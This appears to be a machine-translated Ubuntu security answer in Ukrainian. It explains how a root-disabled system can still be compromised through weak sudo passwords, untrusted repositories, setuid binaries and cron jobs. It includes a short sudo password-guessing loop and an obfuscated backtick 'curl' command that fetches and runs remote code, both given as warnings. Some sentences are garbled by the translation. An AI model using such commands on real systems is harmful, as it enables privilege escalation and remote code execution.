Злом самого кореневого пароля неможливий, оскільки Ubuntu за умовчанням відключив користувача root. Однак якщо ваш користувач може отримати корінь через sudo і ваш пароль легко вгадати / грубої сили, у вас незахищена система. Приклад сценарію, який намагається перевірити деякий пароль:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Додавання ненадійного сховища дозволяє встановлювати програми з цього сховища. Навіть якщо ви явно не встановлюєте подібну програму sudo apt-get install [app-from-repo]
, сховище все одно може впливати на інші програми, змушуючи Ubuntu вважати, що репозиторій містить новішу версію певної програми.
Процес оновлення запускається як root, інакше файли не вдалося записати в /usr/bin
або /etc
. Тригер установки також запускається як root і може запускати довільно, і, можливо, шкідливі команди. Тепер не хвилюйтеся, для оновлення програм потрібні ручні дії, а сховища Ubuntu безпечні. Програмному забезпеченню із закритим кодом, як-от Windows, ніколи не можна повністю довіряти, оскільки ви не можете перевірити джерело на наявність шкідливого коду, але ви можете переглянути джерело програми Ubuntu, якщо це потрібно (не застосовується до власних програм, таких як sun-java6
Flash або Flash).
Як згадував Хав'єр Рівера, помилки в ядрі можуть призвести до довільного виконання коду, але також можливе небезпечне програмне забезпечення, особливо помилкові setsuid
кореневі бінарні файли (бінарні файли, які працюватимуть під власником файлу, root) та інші програми, що працюють під керуванням.
Ви можете створити отвори у безпеці у своїй системі, якщо не звернете уваги на те, що робите. Наприклад, не повністю розуміючи поняття cronjobs, ви додали cronjob, на /etc/cron.daily
який запускаєте програму у вашій домашній папці (наприклад, /bin/sh /home/your-username/myscript.sh
якщо файл myscript.sh написано вами, ви можете видалити вас, експлуатація може спричинити зловмисний код, у myscript.sh
якому буде запускатися як root (ескалація привілеїв).
Щоб залишатися в безпеці, використовуйте свій розум! Не запускайте команди з ненадійних джерел, якщо ви не знаєте, що це робить. Якщо хтось каже, біжіть `curl 3221233674`
із зворотними кліщами, не робіть цього. 3221233674 - це ще один спосіб написання 192.0.32.10
(IP-адреса example.com). Отже, це було б дорівнює:
`curl http://example.com/`
Ці зворотні тики призводять до того, що вихід буде виконуватися як команди оболонки. Простий англійською мовою "Завантажте сторінку http://example.com/ і спробуйте виконати завантажену сторінку".
Спочатку ви не побачили б щось зловмисне в даній команді. Але тепер, ви знаєте, це також можна зловживати.
Завжди перевіряйте команди / скрипт, які ви отримуєте з недовірених джерел, як-от Інтернету.